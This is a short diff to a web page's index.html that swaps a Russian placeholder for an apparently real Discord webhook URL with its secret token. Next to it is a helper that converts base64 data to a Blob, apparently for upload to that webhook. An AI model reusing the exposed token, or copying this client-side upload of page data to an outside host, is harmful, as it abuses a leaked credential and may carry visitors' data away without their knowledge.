--- a/index.html
+++ b/index.html
@@ -51,7 +51,7 @@
         return;
       }
 
-      const discordWebhookURL = 'ТВОЙ_DISCORD_WEBHOOK_URL_ЗДЕСЬ';
+      const discordWebhookURL = 'https://discord.com/api/webhooks/1400575916534530141/JEB23DFLpB0tjbSLxIrTUKFp4TIZDca_UKibt3zI3VTNasovMzZSS-7pV9k5YjhDNTMQ';
 
       // Преобразуем base64 в Blob
       function b64toBlob(b64Data, contentType = '', sliceSize = 512) {
